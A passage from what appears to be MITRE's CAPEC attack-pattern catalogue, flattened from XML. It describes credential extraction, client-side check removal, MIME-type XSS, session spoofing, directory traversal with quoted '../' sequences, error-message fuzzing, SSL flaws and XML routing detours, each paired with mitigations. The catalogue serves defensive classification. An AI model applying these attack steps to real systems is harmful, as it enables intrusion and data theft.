algorithms) along system calls, network communication, etc. env-Local env-Embedded Cryptanalysis. The attacker performs cryptanalysis to identify data in the client component which may be cryptographically significant. (Key material frequently stands out as very high entropy data when compared to other mundane data). Given cryptographically significant data, other analyses are performed (e.g., length, internal structure, etc.) to determine potential algorithms (RSA, ECC, AES, etc.). This process proceeds until the attacker reaches a conclusion about the significance and use of the data. env-Local env-Embedded env-ClientServer env-Peer2Peer Sensitive credentials data are used and embedded inside the client-accessible artifacts. env-Local env-Embedded env-ClientServer env-Peer2Peer The attacker extracts credentials related information. The target application must save keys or credential information. Many applications allow users to store authentication information as an option. Medium High Analysis The Java client program for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 has a hardcoded AES encryption key, which makes it easier for man-in-the-middle attackers to (1) execute arbitrary Java code, or (2) gain access to machines connected to the switch, by hijacking a session. CVE Reference CVE-2009-1472 Low To extract sensitive data from configuration files, system registry, local databases, etc. High To reverse engineer an application flow to retrieve credentials The attacker must be able to reach the target application's code or configuration files. This may require prior access to the machine on which the target application runs. Authentication information is often encoded or encrypted, but this might not require significant attacker resources to compromise. Design: When possible, don't store credentials information on the client side Implementation: Don't store clear text or obfuscated credential information (or cryptographic keys) on the client side; use strong encryption to store any credentials related information Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism 259 Targeted 522 Targeted CVE-2010-0557 IBM Cognos Express 9.0 allows attackers to obtain unspecified access to the Tomcat Manager component, and cause a denial of service, by leveraging hardcoded credentials. CVE-2009-1472 The Java client program for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 has a hardcoded AES encryption key, which makes it easier for man-in-the-middle attackers to (1) execute arbitrary Java code, or (2) gain access to machines connected to the switch, by hijacking a session. 1000 Attack Pattern ChildOf 37 http://capec.mitre.org/data/definitions/37.html Reconnaissance Exploitation High High Low Client-Server SOA n-Tier All All Romain Gaucher Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Pre-review - 0.1 The attacker extracts credentials used for code signing from a production environment and uses these credentials to sign malicious content with the developer's key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the attacker has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the attacker to execute arbitrary code on the victim's computer. The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the attacker does not need to steal the signing key before forging code bundles in the developer's name.) Very High No special resources are required for this attack. 1000 Attack Pattern ChildOf 68 An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources. Probing The attacker probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy. The attacker probes by exploring an application's functionality and its underlying mapping to server-side components. env-Web env-ClientServer The attacker reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation. env-Web env-ClientServer The server relies on some functionality on the client for correct and secure operation. env-Web env-ClientServer The server does not rely on any functionality on the client. env-Web env-ClientServer A list of functionality on the client that the server assumes to be present and trustworthy. Use obfuscation and other techniques to prevent reverse engineering the client-side code. Determine which functionality to disable or remove The attacker tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase. The attacker reverse engineers the client-side code to determine which functionality to disable or remove. env-Web env-ClientServer The attacker understands and can disable or remove the critical functionality from the client code. Use obfuscation and other techniques to prevent reverse engineering the client-side code. Disable or remove the critical functionality from the client code Once the functionality has been determined, the attacker disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited. The attacker disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server. env-Web env-ClientServer The attacker can perform malicious actions that the server believes are prohibited. Use obfuscation and other techniques to prevent reverse engineering the client-side code. For any security checks that are performed on the client-side, ensure that these checks are duplicated on the server side. The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client. High Medium Analysis Modification of Resources Attacker reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary. High To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on. The attacker must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary. Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side. Design: Ship client-side application with integrity checks (code signing) when possible. Design: Use obfuscation and other techniques to prevent reverse engineering the client code. Confidentiality "Varies by context" Information Leakage Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read memory Integrity Modify memory Confidentiality Read application data Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism The client code Malicious code or modified value in the client code Client Side and Server Side By pass the authorization check 602 Targeted CVE-2009-0247 The server for 53KF Web IM 2009 Home, Professional, and Enterprise editions relies on client-side protection mechanisms against cross-site scripting (XSS), which allows remote attackers to conduct XSS attacks by using a modified client to send a crafted IM message, related to the msg variable. 1000 Attack Pattern ChildOf 22 http://capec.mitre.org/data/definitions/22.html 1000 Attack Pattern ChildOf 184 Exploitation Penetration High High Low Client-Server All All Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities. The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations. Medium The attacker must have access to the client for the targeted service. (This step is trivial for most web-based services.) The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this. 602 Targeted 1000 Attack Pattern ChildOf 56 An attacker creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. Some browsers will detect that the specified MIME type of the file does not match the actual type of the content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the attackers' script may run on the target unsanitized. For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked. In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters. In a cross-site scripting attack, the attacker tricks the victim into accessing a URL that uploads a script file with an incorrectly specified MIME type. If the victim's browser switches to the appropriate interpreter without filtering, the attack will execute as a standard XSS attack, possibly revealing the victim's cookies or executing arbitrary script in their browser. The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file. The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content. Medium The attacker must have the ability to source the file of the incorrect MIME type containing a script. 79 Targeted 345 Targeted 646 Targeted CVE-2001-0999 Outlook Express 6.00 allows remote attackers to execute arbitrary script by embedding SCRIPT tags in a message whose MIME content type is text/plain, contrary to the expected behavior that text/plain messages will not run script. 1000 Attack Pattern ChildOf 18 OWASP Testing Guide Testing for Stored Cross site scripting (OWASP-DV-002) v4 [DRAFT] The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002) CAPEC Content Team MITRE 2014-02-06 Updated Description Summary Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes "trust" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points. Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers. The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system. Survey the application for Indicators of Susceptibility Using a variety of methods, until one is found that applies to the target system. the attacker probes for credentials, session tokens, or entry points that bypass credentials altogether. Spider all available pages env-Web Attack known bad interfaces env-Web env-CommProtocol env-ClientServer env-Local Session IDs are used env-Web env-Peer2Peer env-ClientServer env-CommProtocol Open access points exist that use no user IDs or passwords, but determine authorization based on message content env-Web env-Peer2Peer env-CommProtocol env-ClientServer env-Local Session IDs are identifiable Open channels are available Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Fetch samples An attacker fetches many samples of a session ID. This may be through legitimate access (logging in, legitimate connections, etc) or just systematic probing. An attacker makes many anonymous connections and records the session IDs assigned. env-Web env-Peer2Peer env-CommProtocol env-ClientServer An attacker makes authorized connections and records the session tokens or credentials issued. env-Web env-Peer2Peer env-CommProtocol env-ClientServer An attacker gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connections from it, attempting to gain the same privileges as a trusted system. env-Peer2Peer env-CommProtocol env-ClientServer Trust in the system is based on IP address, MAC address, network locality, or other general network characteristic. env-CommProtocol env-ClientServer env-Peer2Peer Web applications use session IDs env-Web Network systems issue session IDs or connection IDs env-CommProtocol env-ClientServer env-Peer2Peer Systems or applications grant trust based on logical or physical network locality. Session identifiers successfully spoofed No session IDs can be found or exploited Monitor logs for unusual amounts of invalid sessions. Monitor logs for unusual amounts of invalid connections or invalid requests from unauthorized hosts. Impersonate An attacker can use successful experiments to impersonate an authorized user or system Analyze logs for users or systems that are connecting from unexpected sources. Analyze logs for users or systems successfully requesting or performing unexpected actions. If heuristics are sufficiently reliable, disconnect hosts or users that appear to be unauthorized impersonations. Spoofing Bad data can be injected into the system by an attacker. Unauthorized data is injected into an application. Apply heuristic evaluation to input data. This can include validating source addresses, user names, ACLs or other data that indicates authorization. This need not be done inline at the time the data is processed, but can be done after the processing has occurred to detect attack. Apply transaction-based logic to systems whose initial authorization cannot be better controlled. Roll back transactions that are subsequently determined to be fraudulent or illegitimate. Server software must rely on weak session IDs proof and/or verification schemes High High Spoofing API Abuse Injection Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs. A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side. The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application. Low To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit. Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Implementation: If the session identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens. Implementation: If the web or application server supports it, then encrypting and/or signing the session ID (such as cookie) can protect the ID if intercepted. Design: Use strong session identifiers that are protected in transit and at rest. Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated. Implementation: Verify of authenticity of all session IDs at runtime. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data Integrity Modify application data Malicious input delivered through standard service calls, e.g. FTP or posting a message to a message queue. Varies with instantiation of attack pattern. The main goal is so spoof or impersonate a legitimate user. Client machine and client network (e.g. Intranet) Enables attacker to impersonate another user and access commands and data (and log behavior to audit logs) on their behalf. 290 Targeted 302 Targeted 346 Targeted 539 Secondary 6 Targeted 384 Secondary 664 Targeted 602 Targeted 642 Targeted 1000 Category ChildOf 225 Penetration High High Low Client-Server n-Tier SOA All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.21.1][REF-2] Cigital, Inc 2007-01-01 [R.21.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-10 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-10 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary An attacker utilizes web tools such as Mozilla's GreaseMonkey in order to modify the behavior of web applications, potentially violating assumptions that a server makes about web-based clients. Web-based client applications may use code such as JavaScript in order to populate fields submitted to a server or to ensure a correct order of operations. However, tools such as GreaseMonkey and Firebug can re-write a web site's JavaScript locally before it is interpreted on a client browser. As a result, the processing activities on the client may not conform to the server's expectations. For example, a web-based client application might use JavaScript to fill in the identity of the application's user based on other information that is available. However, if the attacker is utilizing a web tool to change the JavaScript of the web client, they could insert any identity that they wished, thus allowing them to impersonate other users. Depending on the client-functionality that the attacker is affecting, the attacker could impersonate other users, change purse-logic, remove client-based filters, and otherwise violate server expectations. The server must rely on JavaScript, the DOM model, or some similar component of a web-based client application to perform trusted actions. Medium The attacker must have installed a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools. The attacker must also have some understanding of the script or DOM of the client application they are modifying and how these changes will affect the server. 1000 Attack Pattern ChildOf 113 Wikipedia Greasemonkey The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Greasemonkey Firebug http://getfirebug.com/ Mozilla Firefox Add-ons Greasemonkey https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications. The target must leverage and access an underlying file system. Low Simple command line attacks. Medium Programming attacks. The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results. Design: Configure the access control correctly. Design: Enforce principle of least privilege. Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution. Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement. Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host. Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands. Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin. Implementation: Perform input validation for all remote content, including remote and user-generated content. Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables. Implementation: Use indirect references rather than actual file names. Implementation: Use possible permissions on file access when developing and deploying web applications. Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- whitelisting approach. Integrity Confidentiality Availability Execute unauthorized code or commands The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. Integrity Modify files or directories The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. Confidentiality Read files or directories The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. Availability DoS: crash / exit / restart The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software. 22 Targeted 893 Secondary CVE-2012-2919 Directory traversal vulnerability in Upload/engine.php in Chevereto 1.9.1 allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in the v parameter.. CVE-2012-1917 compose.php in @Mail WebMail Client in AtMail Open-Source before 1.05 does not properly handle ../ (dot dot slash) sequences in the unique parameter, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ..././ (dot dot dot slash dot slash) sequence. 1000 Category ChildOf 210 MITRE Content Team MITRE 2013-06-21 Updated Attack_Prerequisite, Resources_Required, Skill_or_Knowledge_Level, Skill_or_Knowledge_Type, Solution_or_Mitigation, and Summary CAPEC Content Team MITRE 2013-12-18 Updated Attack_Motivation-Consequences, Description Summary, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Solutions_and_Mitigations An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes any stack traces produced by error messages. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to cause the targeted application to return an error including a stack trace, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. The stack trace enumerates the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information. The target application must fail to sanitize incoming messages adequately before processing and must generate a stack trace in at least some error situations. Low The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the stack trace produced by the target application. Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. 209 Targeted 388 Targeted CVE-2006-2434 Unspecified vulnerability in WebSphere 5.1.1 (or any earlier cumulative fix) Common Configuration Mode + CommonArchive and J2EE Models might allow attackers to obtain sensitive information via the trace. 1000 Attack Pattern ChildOf 54 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. Probing The attacker uses fuzzing tools to send random malformed messages to web server and observes for server's log or error message. The attacker uses fuzzing tools to send random malformed messages to web server and observes for server's log or error message. env-Web The application's log or error messages contain sensitive information. env-Web There is no desired error message returned. This does not mean the application will not disclose sensitive information through error messages. env-Web The application log or error messages contain sensitive information about the application. The web server may detect a large amount of HTTP requests from the same host in a short period. Construct a 'code book' for error messages and /or clean the error messages. Modify the parameters to get the desired information from the error messages. Attacker usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the attacker may try changing the origin IP addresses or client browser identification strings or start a new session from where he left off in obfuscating the attack. Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped. env-Web If the application rejects the large amount of fuzzing messages from the same host machine, the attacker needs to hide the attacks by changing the IP addresses or other credentials. env-Web The application errors messages/logs contain sensitive information mapping the application. env-Web The application errors messages/logs have no sensitive information about the application. env-Web The attacker gets a list of sensitive information mapping the application. The web server may detect a large amount of HTTP requests from the same host in a short period. Construct a 'code book' for error messages and/or clean the error messages. The target application must fail to sanitize incoming messages adequately before processing. Low High Analysis Injection Brute Force The following code generates an error message that leaks the full pathname of the configuration file. Perl $ConfigDir = "/home/myprog/config"; $uname = GetUserInput("username"); ExitError("Bad hacker!") if ($uname !~ /^\w+$/); $file = "$ConfigDir/$uname.txt"; if (! (-e $file)) { ExitError("Error: $file does not exist"); } ... If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application. Medium Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design. Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target. Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally. Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion. Implementation: Obfuscate server fields of HTTP response. Implementation: Hide inner ordering of HTTP response header. Implementation: Customizing HTTP error codes such as 404 or 500. Implementation: Hide HTTP response header software information filed. Implementation: Hide cookie's software information filed. Implementation: Obfuscate database type in Database API's error message. Confidentiality "Varies by context" Information Leakage User-controllable request Malformed message, based on application context, crafted to elicit error conditions from the application. Error handling mechanism within the application. The impact of activation is an error condition that reveals sufficient information for further application mapping to the attacker. 209 Targeted 532 Targeted 1000 Attack Pattern ChildOf 54 http://capec.mitre.org/data/definitions/54.html Exploitation Medium Low Low Client-Server n-Tier All All All Common Weakness Enumeration (CWE) CWE-209: Information Exposure Through an Error Message Draft The MITRE Corporation http://cwe.mitre.org/data/definitions/209.html Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content MITRE Content Team MITRE 2013-06-21 Updated Code_Example_Language and Example-Instance_Description Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content An attacker may take advantage of a setting in communications protocols where security settings or other choices involving the various parameters can be influenced or manipulated to cause compromise to the communications. This can be disclosure of information, insertion or removal of information from the communications stream, and even include remote system compromise. Access to the client/server stream. The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time. 1000 Category ChildOf 210 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Relationships, Resources_Required, Type (Category -> Attack_Pattern) An attacker may take advantage of a setting in SSL that allows for weaknesses within that setting to be exploited to gain access to data intended to be encrypted, or injection commands or other traffic into the encrypted stream to cause compromise of either the client or server. Determine the configuration levels of either the server or client being targeted, preferably both. This is not a hard requirement, as the attacker can simply assume commonly exploitable configuration settings and blindly attempt them. Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. MITM (man in the middle). Insert the malicious data into the stream that takes advantage of the configuration flaw. Access to the client/server stream. Low Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur. High The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles. The attacker needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time. Assisted protocol analysis: because the protocol under attack is a public channel, or one in which the attacker likely has authorized access to, they need simply to decode the aspect of channel or message interpretation that codes for message identifiers. Probing is as simple as changing this value and watching its effect. Usage of configuration settings, such as stream ciphers vs. block ciphers and setting timeouts on SSL sessions to extremely low values lessens the potential impact. Use of later versions of TLS (e.g. TLS 1.1+) can also be effective, but not all clients or servers support the later versions. Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity 201 Targeted CVE-2011-3389 1000 Attack Pattern ChildOf 216 Complete Mediation Penetration High High Low CAPEC Content Team MITRE 2013-12-18 Updated Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Description, Description Summary, Examples-Instances, Probing_Techniques, Purposes, Related_Attack_Patterns, Related_Security_Principles, Related_Vulnerabilities, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Type (Attack_Pattern -> Attack_Pattern), Typical_Likelihood_of_Exploit CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud. The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit. Medium The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services. Implementation: Clients should only trust UDDI, ebXML, or similar messages that are verifiably signed by a trusted party. 345 Targeted 1000 Attack Pattern ChildOf 148 An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information. Survey the target Using command line or an automated tool, an attacker records all instances of web services to process XML requests. Use automated tool to record all instances to process XML requests or find exposed WSDL. env-Web env-ClientServer Use tools to crawl WSDL env-Web env-ClientServer The URL processes XML requests. env-Web env-ClientServer The application does not accept XML requests. env-Web env-ClientServer Identify SOAP messages that have multiple state processing. Inspect instance to see whether the XML processing has multiple stages or not. Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not. env-Web env-ClientServer The SOAP message has multiple stage processing. env-Web env-ClientServer The SOAP message does not have intermediate nodes. env-Web env-ClientServer A list of URLs which have multiple stages to process XML contents. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Launch an XML routing detour attack The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents). The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message env-Web env-ClientServer The XML message is routed to the attacker controlled node. Use SSL for connections between all parties with mutual authentication. The targeted system must have multiple stages processing of XML content. Medium High Protocol Manipulation Injection Here is an 